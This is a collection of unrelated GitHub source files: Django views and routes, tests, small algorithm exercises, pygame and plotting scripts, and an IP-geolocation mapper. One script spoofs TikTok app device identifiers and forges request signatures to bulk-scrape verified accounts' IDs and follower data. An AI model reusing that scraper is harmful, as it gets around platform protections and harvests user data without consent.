len(keywords) != 0:\n keyword_list = keywords.split()\n for keyword in keyword_list:\n res = Sneaker.objects.filter(Q(brand__name__icontains=keyword) | Q(title__icontains=keyword))\n if len(res) != 0:\n if len(sneakers) == 0:\n sneakers = res\n else:\n sneakers = sneakers & res\n return render(request, 'sneaker/search_result.html', {'sneakers': sneakers})\n","repo_name":"YuboGuo1024/sneaker_mall","sub_path":"apps/sneaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7876199752","text":"import os\nimport pytest\nfrom opgee.error import CommandlineError\nfrom opgee.config import IsWindows\nDEVNULL = 'nul' if IsWindows else '/dev/null'\n\nis_sherlock = os.environ.get('LMOD_SYSHOST') == 
'sherlock'\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\n@pytest.mark.parametrize(\n \"args\", [\n ['graph', '--classes', 'core', '--classes-output', DEVNULL],\n ['graph', '--field', 'gas_lifting_field', '--field-output', DEVNULL],\n ['graph', '--hierarchy-output', DEVNULL],\n ]\n)\ndef test_graphing(opgee_main, args):\n try:\n opgee_main.run(None, args)\n good = True\n except Exception as e:\n # print(e)\n good = False\n\n assert good\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\ndef test_unknown_field(opgee_main):\n with pytest.raises(CommandlineError, match=r\"Field name .* was not found in model\"):\n opgee_main.run(None, ['graph', '--field', 'unknown-field'])\n","repo_name":"Stanford-EAO/OPGEEv4","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"72186346661","text":"from django.conf import settings\nfrom django.views import defaults as default_views\nfrom django.urls import path, re_path\nfrom django.conf.urls.static import static\nfrom adminfeautures.views import (\n user_list_view,\n update_solar_module_preise_view,\n update_wallbox_preise_view,\n update_optional_accessories_preise_view,\n update_andere_konfiguration_werte_view,\n avatar_upload_form,\n delete_user,\n test_delete_selected,\n PasswordUpdateView,\n ViewAdminOrders,\n UpdateAdminAngebot,\n DeleteAngebot,\n UserUpdateView,\n TopVerkauferContainerUpdateView,\n DeleteSelectedAngebots,\n)\n\napp_name = \"adminfeautures\"\n\nurlpatterns = [\n path(\"user-list/\", user_list_view, name=\"user_list\"),\n path(\"user//edit/\", UserUpdateView.as_view(), name=\"user-edit\"),\n path(\n \"user//top-verkaufer-container-update/\",\n TopVerkauferContainerUpdateView.as_view(),\n name=\"top-verkaufer-container-update\",\n ),\n path(\"user//orders/\", ViewAdminOrders.as_view(), name=\"user-orders\"),\n path(\"user//user-update/\", UserUpdateView.as_view(), name=\"user-update\"),\n path(\n \"user//change_password/\",\n PasswordUpdateView.as_view(),\n name=\"change_password\",\n ),\n path(\"user//delete/\", delete_user, name=\"delete_user\"),\n path(\n \"user//orders/\",\n ViewAdminOrders.as_view(),\n name=\"view_admin_orders\",\n ),\n path(\n \"user//orders//\",\n UpdateAdminAngebot.as_view(),\n name=\"update_admin_angebot\",\n ),\n path(\n \"user//orders/delete//\",\n DeleteAngebot.as_view(),\n name=\"delete_angebot\",\n ),\n path(\n \"user//orders/test-delete-selected/\",\n test_delete_selected,\n name=\"test_delete_selected\",\n ),\n path(\n \"user//orders/delete-selected/\",\n DeleteSelectedAngebots.as_view(),\n name=\"delete_selected_angebots\",\n ),\n path(\"user//upload-avatar/\", avatar_upload_form, name=\"upload_avatar\"),\n path(\n \"prices/update_solar_module_preise//\",\n update_solar_module_preise_view,\n name=\"update_solar_module_preise\",\n ),\n path(\n \"prices/update_wallbox_preise//\",\n update_wallbox_preise_view,\n name=\"update_wallbox_preise\",\n ),\n path(\n \"prices/update_optional_accessories_preise//\",\n update_optional_accessories_preise_view,\n name=\"update_optional_accessories_preise\",\n ),\n path(\n \"prices/update_andere_konfiguration_werte//\",\n update_andere_konfiguration_werte_view,\n name=\"update_andere_konfiguration_werte\",\n ),\n re_path(\n r\"^400/$\",\n default_views.bad_request,\n kwargs={\"exception\": 
Exception(\"Bad Request!\")},\n ),\n re_path(\n r\"^403/$\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n re_path(\n r\"^404/$\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n re_path(r\"^500/$\", default_views.server_error),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"teamitjuno/jsh-ubuntu-droplet","sub_path":"adminfeautures/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74666496740","text":"# Replace every array element by multiplication of previous and next\n# Given an array of integers, update every element with multiplication of previous and next elements with following exceptions.\n# a) First element is replaced by multiplication of first and second.\n# b) Last element is replaced by multiplication of last and second last.\n\ndef MultiplicationPreviousNext(ary):\n\n fnl_lst=[]\n\n for i in range(0,len(ary)):\n if i==0:\n fnl_lst.append(ary[i]*ary[i+1])\n elif i==len(ary)-1:\n fnl_lst.append(ary[i-1]*ary[i])\n else:\n fnl_lst.append(ary[i-1]*ary[i+1])\n\n return fnl_lst\n\ndef main():\n \n ary=[2, 3, 4, 5, 6]\n print(MultiplicationPreviousNext(ary))\n\nif __name__=='__main__':\n main()","repo_name":"ksayee/programming_assignments","sub_path":"python/CodingExercises/MultiplicationPreviousNext.py","file_name":"MultiplicationPreviousNext.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41106654727","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 12:52:01 2020\nCircle Detection inspiration:\nhttps://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n@author: modal\n\"\"\"\n#%% INIT\nimage_file_name = 'a2_a_cropped.jpg'\n\nfrom well_plate_project.config import data_dir\nraw_data_dir = data_dir / 'raw'\npath = raw_data_dir / 'EXPERIMENTS'\nimage_file = raw_data_dir / image_file_name\nassert image_file.is_file()\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# Load in image, convert to gray scale, and Otsu's threshold\nimage = cv2.imread(str(image_file))\nplt.imshow(image)\nplt.show()\n\noutput = image.copy()\nheight, width = image.shape[:2]\nmaxRadius = int(1.05*(width/14)/2) #12+2\nminRadius = int(0.79*(width/14)/2) #12+2\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncircles = cv2.HoughCircles(image=gray, \n method=cv2.HOUGH_GRADIENT, \n dp=1.2, \n minDist=2*minRadius, #there is no overlapping, you could say that the distance between two circles is at least the diameter, so minDist could be set to something like 2*minRadius.\n param1=50,\n param2=50,\n minRadius=minRadius,\n maxRadius=maxRadius \n )\n\nif circles is not None:\n # convert the (x, y) coordinates and radius of the circles to integers\n circlesRound = np.round(circles[0, :]).astype(\"int\")\n # loop over the (x, y) coordinates and radius of the circles\n for (x, y, r) in circlesRound:\n cv2.circle(output, (x, y), r, (0, 255, 0), 4)\n\n plt.imshow(output)\nelse:\n print ('No circles 
found')\n\n\n\n#https://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n\n","repo_name":"MthBr/well-plate-light-driven-predictions","sub_path":"well_plate_project/data_etl/backup_test/circle_detection_test2.py","file_name":"circle_detection_test2.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20232276158","text":"# 5 лаба\nimport numpy as np\nimport matplotlib.pyplot as canvas\nfrom numpy import log as ln\n\n\ndef f(x):\n return (x ** 2) * ln(x)\n\n\ndef f2(x):\n return 2 * ln(x) + 3\n\n\ndef trapecy(x, h, a, b):\n size = len(x)\n res = (f(a) + f(b)) / 2\n for i in range(1, size):\n res += f(x[i])\n return res * h\n\n\ndef simpson(x, h, a, b):\n size = int(len(x) / 2)\n res = (f(a) + 4 * f(a + h) + f(b))\n for i in range(1, size):\n res += 2 * f(x[2 * i]) + 4 * f(x[2 * i + 1])\n return res * h / 3\n\n\na = 1\nb = 2\nd = np.arange(a, b, 0.001)\ncanvas.figure(1)\ncanvas.title(\"2я производная\")\ncanvas.xlabel(\"Х\")\ncanvas.ylabel(\"Y\")\ncanvas.grid()\ncanvas.plot(d, f2(d))\nx_m = 2.0 # максимум 2й производной. Получен графическим методом\nm = f2(x_m) # максимальное значение 2й производной\n# eps = 0.00001\n# h = numpy.sqrt(eps*12/((b-a)*m)) # h = 0.005230482293837083\n# n = (b-a)/h #n = 192 (на самом деле 191.186958...., но берем 192 т.к. кратно 4) 192/4 = 48\nh = (b - a) / 192\nxh = np.arange(a, b, h)\nx2h = np.arange(a, b, 2 * h)\ntrapecy1 = trapecy(xh, h, a, b)\ntrapecy2 = trapecy(x2h, 2 * h, a, b)\nsimpson1 = simpson(xh, h, a, b)\nsimpson2 = simpson(x2h, 2 * h, a, b)\nexact = 1.070614703715409714001507879444 # точный результат\nprint(\"Метод трапеций:\")\nprint(\"\\tРезультат с шагом h ► \" + str(trapecy1) + \"\\n\\t\\tс шагом 2h ► \" + str(trapecy2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - trapecy1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(trapecy2 - trapecy1) / 3))\nprint(\"Метода Симпсона:\")\nprint(\"\\tРезультат с шагом h ► \" + str(simpson1) + \"\\n\\t\\tс шагом 2h ► \" + str(simpson2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - simpson1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(simpson2 - simpson1) / 15))\ncanvas.show()\n","repo_name":"MalyshkinMike/Gubar","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23132176977","text":"import os\nimport pygame\nimport time\nimport random\n\nlast_point = [320, 0]\nlast_point1 = [320, 0]\n\n\ndef setup(screen, etc):\n pass\n\ndef draw(screen, etc):\n \n global last_point, last_point1, speed\n \n linewidth = int(etc.knob1*10)+1\n #lines = int(etc.knob2*89)+10\n #lines2\n lines = 72#int(65-(etc.knob2*65))+7\n spacehoriz = 180*etc.knob2+18\n spacevert = spacehoriz\n recsize = 10*etc.knob3\n #if recsize <1 : recsize = 0\n \n \n \n \n for m in range(0, lines) :\n \n #space = int(1280/lines)\n x = m*spacehoriz\n y = 0\n auDio = etc.audio_in[m] / 35\n color = etc.color_picker()\n if auDio < 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y + auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0)\n \n for i in range(0, lines) :\n \n #space = int(1280/lines)\n x = i*spacehoriz\n y = 720\n auDio = etc.audio_in[i] / 35\n color = etc.color_picker()\n if auDio > 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y - -auDio], linewidth)\n if 
recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0) \n \n for j in range(0, lines) :\n \n space = j*spacehoriz\n \n pygame.draw.line(screen, color, (0,space), (1280,space), linewidth)\n \n \n \n \n ","repo_name":"critterandguitari/ETC_Modes","sub_path":"S - Mirror Grid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"16447370923","text":"import pandas as pd\nimport pytest\nimport os\nimport numpy as np\nimport pickle\nfrom model.ml.data import process_data\nfrom model.ml.model import compute_model_metrics, inference\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\nTEST_DATA_PATH = \"data/raw-census.csv\"\nMODEL_PATH = \"model/saved_models/saved_model.pkl\"\nENCODER_PATH = \"model/saved_models/saved_encoder.pkl\"\nLB_PATH = \"model/saved_models/saved_lb.pkl\"\n\n\n@pytest.fixture\ndef data():\n \"\"\"Load some test data.\"\"\"\n\n if os.path.isfile(TEST_DATA_PATH):\n logger.info(f\"Loading data file {TEST_DATA_PATH}\")\n data = pd.read_csv(TEST_DATA_PATH, nrows=200)\n else:\n logger.info(f\"Data file {TEST_DATA_PATH} not found\")\n exit()\n\n return data\n\n\n@pytest.fixture\ndef cat_features():\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n return cat_features\n\n\n@pytest.fixture\ndef model():\n return pickle.load(open(MODEL_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef encoder():\n return pickle.load(open(ENCODER_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef lb():\n return pickle.load(open(LB_PATH, \"rb\"))\n\n\ndef test_process_data(data, cat_features):\n\n X_train, y_train, encoder, lb = process_data(\n data, categorical_features=cat_features, label=\"salary\", training=True\n )\n\n assert (\n X_train.shape[0] == data.shape[0]\n ), \"Wrong number of rows in source data\"\n\n assert (\n X_train.shape[1] > data.shape[1]\n ), \"Wrong number of features in processed data\"\n\n assert (\n y_train.shape[0] == data.shape[0]\n ), \"Wrong shape of y_train rows after processing data\"\n\n\ndef test_compute_model_metrics():\n\n y = np.array([0, 0, 0, 0, 0, 0, 0, 1, 1, 1])\n preds = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1])\n precision, recall, fbeta = compute_model_metrics(y, preds)\n\n assert precision > 0.9\n assert recall > 0.6\n assert fbeta > 0.6\n\n\ndef test_inference(model, encoder, lb, data, cat_features):\n \"\"\"Test model inference\"\"\"\n\n X_test, y_test, encoder, lb = process_data(\n data,\n categorical_features=cat_features,\n encoder=encoder,\n lb=lb,\n label=\"salary\",\n training=False,\n )\n\n y_pred = inference(model, X_test)\n\n assert y_pred.shape[0] == X_test.shape[0], \"Wrong predictions shape\"\n pred_average = np.average(y_pred)\n assert (\n 1 >= pred_average >= 0\n ), \"Prediction average of {pred_average} is not between 0 and 1\"\n\n\n# if __name__ == \"__main__\":\n\n# test_inference(model(), encoder(), lb(), data(), cat_features())\n# test_compute_model_metrics()\n# test_process_data(data(), cat_features())\n","repo_name":"ainfinum/mlops-project3","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11278248011","text":"from __future__ import 
division\nimport pygame, sys\nfrom pygame.locals import *\npygame.init()\n\n\"\"\" ericbic.py\nby Eric J.Parfitt (ejparfitt@gmail.com)\n\nThis program is designed for coding and decoding the roman alphabet\ninto and out of a character set I made up. My characters are all made\nup of either one or two of a set of four different character parts which\ncan be combined in different ways to get a total of 30 new characters.\n\nVersion: 1.0 alpha\n\"\"\"\n\nWIDTH = 500\nHEIGHT = 400\n\nwindowSurface = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nFPS = 60\nclock = pygame.time.Clock()\n\nclass Icon:\n def __init__(self, image, position=(0, 0)):\n self.image = image\n self.rect = image.get_rect()\n self.rect.x = position[0]\n self.rect.y = position[1]\n\nclass Canvas:\n def __init__(self):\n self.isTop = self.isBottom = self.isFlipped = self.isReset = False\n self.text = None\n self.bottomHalf = None\n self.topHalf = None\n \n def getIcon(self, pallet, mouseLoc):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image)\n return newIcon, i\n return None, None\n \n def tryAdd(self, pallet, mouseLoc, position):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image, position)\n windowSurface.blit(newIcon.image, newIcon.rect)\n return i\n\n def moveBottomHalf(self, bottomHalf, topHalf):\n self.bottomHalf.rect.topleft = self.topHalf.rect.bottomright\n self.bottomHalf.rect.move_ip(0, -int(round(CURVE_WIDTH)))\n \n def update(self, isClick, letter):\n mouseLoc = pygame.mouse.get_pos()\n if letter is not None:\n if self.isFlipped:\n for icon in pallet:\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = False\n letter = letter.capitalize()\n row, col = next(((i, row.index(letter)) for i, row in\n enumerate(alphabet) if letter in row), (None, None))\n if row is not None:\n self.isReset = True\n oldTopHalf = self.topHalf\n oldBottomHalf = self.bottomHalf\n self.topHalf = Icon(pallet[row].image, TOP_CO)\n if col != 0:\n self.bottomHalf = Icon(pallet[col - 1].image)\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n else:\n self.bottomHalf = None\n if self.topHalf is not None:\n for icon in [oldTopHalf, oldBottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n if self.bottomHalf is not None:\n self.bottomHalf.image = pygame.transform.flip(\n self.bottomHalf.image, False, True)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK), (300, 300))\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip() \n letter = None\n elif isClick:\n newIcon, index = (self.getIcon(pallet, mouseLoc))\n if newIcon is not None:\n if self.isReset:\n for icon in [self.topHalf, self.bottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n self.isTop = self.isBottom = self.isReset = False\n if not (self.isTop and self.isBottom):\n if not self.isTop:\n self.isTop = True\n self.topHalf = newIcon\n self.topIndex = index\n self.topHalf.rect.topleft = TOP_CO\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n letter = 
alphabet[self.topIndex][0]\n else:\n self.isBottom = True\n self.bottomHalf = newIcon\n bottomIndex = index\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n letter = alphabet[self.topIndex][bottomIndex + 1]\n self.isReset = True\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK),\n (300, 300))\n for icon in pallet:\n #if icon is not None:\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = not self.isFlipped\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip()\n letter = None\n clock.tick(FPS)\n return letter\n\nwindowSurface.fill(WHITE)\nimageFiles = [\"EribicBump.png\", \"EribicSpike.png\", \"EribicLoop.png\",\n \"EribicLeftWave.png\", \"EribicRightWave.png\"]\npallet = [Icon(pygame.image.load(image)) for image in imageFiles]\nnoneSymbol = \"?\"\nalphabet = [[\"N\", \"U\", \"M\", \"R\", \"F\", noneSymbol],\n [\"I\", \"C\", \"T\", \"J\", \"V\", \"G\"], [\"E\", \"L\", \"H\", \"O\", \"K\", \"B\"],\n [\"A\", \"D\", \"Y\", \"Q\", noneSymbol, \"W\"],\n [\"S\", noneSymbol, \"P\", \"Z\", \"X\", noneSymbol]]\nletter = None\nfont = pygame.font.SysFont(\"comicsansms\", 72)\nICON_HEIGHT = 50\nORIGINAL_ICON_HEIGHT = 75.328\nORIGINAL_CURVE_WIDTH = 2.5\nCURVE_WIDTH = (ICON_HEIGHT / ORIGINAL_ICON_HEIGHT) * ORIGINAL_CURVE_WIDTH\nTOP_CO = (50, 200)\nwidthTotal = 0\nfor icon in pallet:\n width = icon.image.get_width() * ICON_HEIGHT / icon.image.get_height()\n icon.image = pygame.transform.smoothscale(icon.image, \n (int(round(width)), ICON_HEIGHT))\n icon.rect = icon.image.get_rect()\n widthTotal += width\nxLoc = 0\nfor i in range(len(pallet)):\n icon = pallet[i]\n icon.rect.x = xLoc\n windowSurface.blit(icon.image, icon.rect)\n xLoc += icon.image.get_width() + (WIDTH - widthTotal) / (len(pallet) - 1)\nisFlipped = False\npygame.display.flip()\ncanvas = Canvas()\n\nwhile(True):\n isClick = False\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEBUTTONDOWN:\n if event.button == 1:\n isClick = True\n elif event.type == KEYDOWN:\n if event.unicode.isalpha():\n letter = event.unicode\n letter = canvas.update(isClick, letter)\n","repo_name":"esopsis/Ericbic","sub_path":"eribic.py","file_name":"eribic.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31665849587","text":"import sqlite3\nimport re\nimport pandas as pd\nimport plotly.express as px\nimport requests\n\ndef main():\n # mapCountryData()\n # Should create mkdir method\n ipList = retrieveAllIpAddress()\n\n if (len(ipList) > 0): \n ipHashMap = mapIpToCoordinates(ipList)\n updateDatabaseWithCoordinates(ipHashMap)\n else:\n print(\"no ip addresses needed to retrieve coordinates\")\n \n mapCountryDataWithDb()\n groupDataByMonths()\n\ndef retrieveAllIpAddress():\n print(\"retrieving ip addresses from table\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n select_all_ips_query = \"SELECT ip_address FROM tool_download_count WHERE coord_updated IS FALSE\"\n ipList_raw = cursor.execute(select_all_ips_query)\n\n ipList = [i[0] for i in ipList_raw]\n\n return ipList\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i 
in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef requestIpApi(listofIp, ipToMetaMap):\n url = 'http://ip-api.com/batch'\n\n response = requests.post(url, json=listofIp)\n if response: \n responseJson = response.json()\n if responseJson:\n for obj in responseJson:\n ip = obj['query']\n ipToMetaMap[ip] = obj\n else:\n print('status raise', response.raise_for_status())\n else: \n print('status code', response.status_code)\n\n return ipToMetaMap\n\n# the ip-api batch endpoint accepts at most 100 IP addresses per request; use 50 to stay safely below that limit\nMAX_API_BATCH_SIZE = 50\n\ndef mapIpToCoordinates(listofIp):\n print(\"batch conversion of IP addresses, %d per request\" % MAX_API_BATCH_SIZE)\n \n ipToMetaMap = {}\n for batch in chunks(listofIp, MAX_API_BATCH_SIZE):\n # requestIpApi fills in and returns the same dict, so no extra merge step is needed\n ipToMetaMap = requestIpApi(batch, ipToMetaMap)\n\n return ipToMetaMap\n\n\ndef updateDatabaseWithCoordinates(ipMap):\n print(\"update table with lat / lon coordinates\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n for key in ipMap:\n ipx = key\n lat = \"\"\n lon = \"\"\n country = \"\"\n regionName = \"\"\n city = \"\"\n zip = \"\"\n\n if ipMap[key]['status'] == \"success\":\n lat = ipMap[ipx]['lat']\n lon = ipMap[ipx]['lon']\n country = ipMap[ipx]['country']\n regionName = ipMap[ipx]['regionName']\n city = ipMap[ipx]['city']\n zip = ipMap[ipx]['zip']\n\n cursor.execute(\n '''UPDATE tool_download_count SET ip_lat=?, ip_long=?, country=?, region=?, city=?, zip=?, coord_updated=? \\\n WHERE ip_address=? AND coord_updated IS FALSE''', (lat, lon, country, regionName, city, zip, 1, ipx))\n\n dbconn.commit()\n\ndef mapCountryDataWithDb():\n # Testing panda scatter geo plot with select db import\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n fig = px.scatter_geo(df, lat='ip_lat',\n lon='ip_long', hover_name=\"city\",\n width=800, height=400)\n\n fig.update_layout(plot_bgcolor=\"rgba(0, 0, 0, 0)\", paper_bgcolor=\"rgba(0, 0, 0, 0)\", margin=dict(l=0, r=0, t=0, b=0))\n\n fig.show()\n\n # Using kaleido - export in PNG\n fig.write_image(\"map/images/output.png\")\n\n # Export in HTML\n fig.write_html(\"map/html/output.html\")\n\ndef groupDataByMonths():\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n df['Year'] = pd.to_datetime(df['date_download']).dt.year\n df['Month'] = pd.to_datetime(df['date_download']).dt.month\n\n g = df.groupby([('Year'), ('Month')]).sum().to_json(r\"map/json/map_months.json\")\n # print(g)\n\ndef mapCountryData():\n # Testing panda scatter geo plot with csv import\n\n df = pd.read_csv(\"csv/countries.csv\")\n\n fig = px.scatter_geo(df, lat='latitude',\n lon='longitude', hover_name=\"name\")\n fig.update_layout(title='World map', title_x=0.5)\n fig.show()\n\n\n# Call main\nif __name__ == \"__main__\":\n main()\n","repo_name":"jessewoo/githubStats","sub_path":"map/mapDb.py","file_name":"mapDb.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"30942129302","text":"#!/usr/bin/python3\n\n\"\"\"\ninitialize Convectron gauge controller, then provide user with an interactive console for debugging\n\"\"\"\n\nimport convectron475 as convectron\nimport traceback\n\ngauge = convectron.ConvectronController(port=\"/dev/cu.usbserial-ftE17ZWN\")\n\nwhile True:\n\tcmd = input(\"gauge.\")\n\ttry:\n\t\tret = 
eval(\"gauge.{}\".format(cmd))\n\t\tprint(ret)\n\texcept:\n\t\ttraceback.print_exc()\n\t\tgauge.disconnect()","repo_name":"octopode/pyvectron","sub_path":"convectrontest.py","file_name":"convectrontest.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70058091300","text":"import time\nimport string\nimport requests\nimport itertools\n\nfrom urllib.parse import urlencode\nfrom utils.signer import *\n\nclass Verifinder:\n def __init__(self, proxy: str or None = None, count: int = 4) -> None:\n self.proxies = {'http': f'http://{proxy}', 'https': f'http://{proxy}'} if proxy else None\n self.accounts = []\n self.keywords = get_keywords(count)\n\n def __base_params(self, keyword: str, cursor: int = 0) -> str:\n return urlencode({\n \"count\" : 30,\n \"cursor\" : cursor,\n \"keyword\" : keyword,\n \"search_source\" : \"report_user\",\n \"type\" : 1,\n \"request_tag_from\" : \"h5\",\n \"storage_type\" : 0,\n \"iid\" : 7137816409338136325,\n \"channel\" : \"googleplay\",\n \"device_type\" : \"SM-G973N\",\n \"device_id\" : 6990239216324986369,\n \"os_version\" : 9,\n \"version_code\" : 160904,\n \"app_name\" : \"musically_go\",\n \"device_brand\" : \"samsung\",\n \"device_platform\" : \"android\",\n \"aid\" : 1340,\n })\n \n def __base_headers(self, params: str) -> dict:\n sig = XGorgon(\n params = params\n ).get_value()\n \n return {\n \"accept-encoding\" : \"gzip\",\n \"sdk-version\" : \"2\",\n \"x-ss-req-ticket\" : str(int(time.time() * 1000)),\n \"x-khronos\" : sig[\"X-Khronos\"],\n \"x-gorgon\" : sig[\"X-Gorgon\"],\n \"host\" : \"api16-normal-c-useast1a.tiktokv.com\",\n \"connection\" : \"Keep-Alive\",\n \"user-agent\" : \"okhttp/3.10.0.1\"\n }\n \n def __scrape_veris(self, keyword: str, cursor: int = 0) -> requests.Response:\n __base_params = self.__base_params(keyword, cursor)\n \n return requests.get(\n url = (\n \"https://api16-normal-c-useast1a.tiktokv.com\"\n + \"/aweme/v1/discover/search/?\"\n + __base_params \n ),\n headers = self.__base_headers(__base_params)\n )\n \n def main(self):\n cursor = 0\n for keyword in self.keywords:\n while True:\n try:\n __scrape_req = self.__scrape_veris(keyword, cursor)\n # print(__scrape_req.text)\n for _ in __scrape_req.json()[\"user_list\"]:\n if _[\"user_info\"][\"unique_id\"] not in self.accounts:\n \n self.accounts.append(_[\"user_info\"][\"unique_id\"])\n info_string = f'{_[\"user_info\"][\"unique_id\"]}:{_[\"user_info\"][\"follower_count\"]}:{_[\"user_info\"][\"uid\"]}:{_[\"user_info\"][\"sec_uid\"]}:{_[\"user_info\"][\"region\"]}'\n \n print(info_string)\n \n with open(\"utils/veris.txt\") as file:\n file.write(info_string + \"\\n\")\n \n if len(__scrape_req.json()[\"user_list\"]) == 0:\n cursor = 0\n break\n \n cursor += 30 if cursor < 30 else 31\n \n except Exception:\n cursor = 0\n break\n \nif __name__ == \"__main__\":\n Verifinder().main()","repo_name":"xtekky/TikTok-Verified-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"35"} +{"seq_id":"23279257994","text":"from functools import cmp_to_key\nfrom itertools import chain\nfrom typing import *\n\nimport edgir\nfrom edg_core import *\nfrom . 
